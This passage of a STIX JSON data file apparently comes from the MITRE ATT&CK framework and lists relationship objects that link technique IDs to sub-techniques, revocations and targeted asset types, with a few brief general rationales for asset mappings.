"relationship--53cfa0ee-9802-4abb-8be5-7411095dbe8f", "created": "2020-10-02T15:59:11.783Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--0dda99f0-4701-48ca-9774-8504922e92d3", "target_ref": "attack-pattern--9d48cab2-7929-4812-ad22-f536665f0109", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--53d7a78d-1431-49e8-944c-62c875e58a20", "created": "2023-09-29T17:08:37.793Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:08:37.793Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5425d1cd-8840-4640-90a3-72f3bd7151bd", "created": "2023-09-29T17:44:32.341Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:44:32.341Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--544e996c-0bdc-42b2-91af-14c27d4213b9", "created": "2023-09-28T21:09:23.185Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:09:23.185Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3de230d4-3e42-4041-b089-17e1128feded", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--54a7bc3f-c05f-4fb3-a980-ffc8750a0a56", "created": "2023-09-28T20:10:44.014Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:10:44.014Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--55678635-c41a-40cf-9dcf-21dcc443a923", "created": "2023-02-27T22:51:27.316Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-02-27T22:51:27.316Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--ba04e672-da86-4e69-aa15-0eca5db25f43", "target_ref": "attack-pattern--40597f16-0963-4249-bf4c-ac93b7fb9807", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--559d4b9f-55ed-4626-9be2-a64638d0bfc3", "created": "2020-10-15T12:05:58.968Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--cabe189c-a0e3-4965-a473-dcff00f17213", "target_ref": "attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5677e801-bd49-404b-b54a-6b00da52530c", "created": "2023-09-29T16:39:01.824Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:39:01.824Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--56896f6b-27fe-4396-bfea-d3c1a7580b18", "created": "2023-09-29T18:05:18.147Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:05:18.147Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--577b53a0-44ff-4cc4-b571-455d61e596c0", "created": "2023-09-28T20:27:17.431Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:27:17.431Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--57932175-4fe3-4ea1-b758-4cb6156273b2", "created": "2020-01-17T16:52:36.096Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--dd901512-6e37-4155-943b-453e3777b125", "target_ref": "attack-pattern--d10cbd34-42e3-45c0-84d2-535a09849584", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--579bdadc-b080-49f1-be32-283b06444569", "created": "2020-10-01T01:09:53.313Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--65013dd2-bc61-43e3-afb5-a14c4fa7437a", "target_ref": "attack-pattern--cdfc5f0a-9bb9-4352-b896-553cfa2d8fd8", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--57a31238-b362-4c07-b8ae-45a619ece297", "created": "2020-01-24T14:56:24.425Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--42fe883a-21ea-4cfb-b94a-78b6476dcc83", "target_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--57f8be8f-6bdb-4bee-a8af-335b3b651778", "created": "2024-05-22T15:26:11.460Z", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-22T15:26:11.460Z", "description": "Asset Mapping Rationale: Adversaries may gain access to and use centralized software suites installed within an enterprise to execute commands and move laterally through the network. Access to network-wide or enterprise-wide endpoint management software may enable an adversary to achieve remote code execution on all connected systems. Network infrastructure devices may also have configuration management tools that can be similarly abused by adversaries.", "relationship_type": "targets", "source_ref": "attack-pattern--92a78814-b191-47ca-909c-1ccfe3777414", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--58a95ec2-0079-4d58-a7ed-02664c1095ba", "created": "2023-09-28T19:38:03.976Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:38:03.976Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--58f5c89c-7ed2-4e14-ac07-6e95da16e2f1", "created": "2023-09-28T20:27:33.713Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:27:33.713Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5968cbde-b3da-46df-a8bd-a30c2d85363b", "created": "2023-09-28T21:28:21.910Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:28:21.910Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--59aad4ce-6728-4988-8a17-9f223629c7cd", "created": "2024-05-22T17:22:16.145Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T02:12:46.315Z", "description": "Asset Mapping Rationale: Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Typically, management services over commonly used ports are used when password spraying.", "relationship_type": "targets", "source_ref": "attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--59b53303-e4df-49ec-8e5a-812f2b4265a8", "created": "2023-09-29T17:09:25.690Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:09:25.690Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--59b7cc7f-469c-4dba-8ee0-4d458777abe7", "created": "2023-03-23T19:55:28.695Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-03-23T19:55:28.695Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939", "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5a67ece5-7409-4eb5-8c64-4a67e2f52776", "created": "2020-03-09T14:15:05.754Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56", "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5a742223-f67f-447f-af86-5ed546f8476b", "created": "2020-10-02T16:27:55.863Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--6ee2dc99-91ad-4534-a7d8-a649358c331f", "target_ref": "attack-pattern--937e4772-8441-4e4a-8bf0-8d447d667e23", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5a97008b-c23b-4890-ba76-c30cf2a18fba", "created": "2023-09-28T20:07:36.295Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:07:36.295Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5b0a440d-575a-4c1a-97aa-56945686f85a", "created": "2020-03-27T21:06:33.285Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--4ff5d6a8-c062-4c68-a778-36fc5edd564f", "target_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5b13a608-dc78-463c-bf02-5a22ee304912", "created": "2024-05-22T17:23:33.702Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T02:14:31.314Z", "description": "Asset Mapping Rationale: Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network.", "relationship_type": "targets", "source_ref": "attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5b14c813-09e2-4709-ab42-94830cf9538c", "created": "2023-09-29T18:42:39.876Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:42:39.876Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5b37828a-67db-4d36-831f-be0a6c3003b6", "created": "2020-03-19T15:08:50.236Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--e99ec083-abdd-48de-ad87-4dbf6f8ba2a4", "target_ref": "attack-pattern--573ad264-1371-4ae0-8482-d2673b719dba", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5b391743-83ec-43c8-a156-4ded2b623293", "created": "2024-05-22T15:32:28.224Z", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-22T15:32:28.224Z", "description": "Asset Mapping Rationale: Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. SSH keys can also be added to accounts on network devices, such as with the ip ssh pubkey-chain Network Device CLI command. ", "relationship_type": "targets", "source_ref": "attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5b6ff1ab-eeca-43bc-8cd5-156bd8d3df8a", "created": "2021-03-31T14:01:52.511Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--f8ef3a62-3f44-40a4-abca-761ab235c436", "target_ref": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5bda6db3-c05b-4733-8935-a11dfc30c64d", "created": "2020-03-30T20:17:22.228Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", "target_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5bde01dc-6c27-4494-a3eb-7a7d98982477", "created": "2020-03-02T19:30:53.662Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--d3df754e-997b-4cf9-97d4-70feb3120847", "target_ref": "attack-pattern--f6ad61ee-65f3-4bd0-a3f5-2f0accb36317", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5bf0b5fd-d626-406a-9aa4-17b87b921b2d", "created": "2024-05-23T04:17:04.199Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T02:15:45.464Z", "description": "Asset Mapping Rationale: Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.", "relationship_type": "targets", "source_ref": "attack-pattern--fb640c43-aa6b-431e-a961-a279010424ac", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5c3c9a95-98ee-4f60-8291-c4c34347adb6", "created": "2020-03-19T18:17:25.951Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--c0a384a4-9a25-40e1-97b6-458388474bc8", "target_ref": "attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5c61c8a2-bfff-43fb-8397-bff864413d74", "created": "2023-09-29T17:06:09.673Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:06:09.673Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5cc8aab6-8697-4277-8a12-290bfd15705d", "created": "2020-10-01T00:40:45.362Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--197ef1b9-e764-46c3-b96c-23f77985dc81", "target_ref": "attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5d6f0f0e-7479-480a-aaef-92a3e8d8b7c8", "created": "2020-03-06T21:04:12.593Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938", "target_ref": "attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5dcd5aa6-e485-4468-80b7-5964c49d09dc", "created": "2024-05-22T17:09:23.607Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T02:17:40.287Z", "description": "Asset Mapping Rationale: Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. On network devices, adversaries may use crafted packets to enable Network Device Authentication for standard services offered by the device such as telnet.", "relationship_type": "targets", "source_ref": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5dedb236-b37b-4e6b-bd3d-a09ddc1e9c17", "created": "2021-06-03T18:44:29.898Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--b46a801b-fd98-491c-a25a-bca25d6e3001", "target_ref": "attack-pattern--d456de47-a16f-4e46-8980-e67478a12dcb", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5e324da5-0fee-4dac-b289-410d560e03e9", "created": 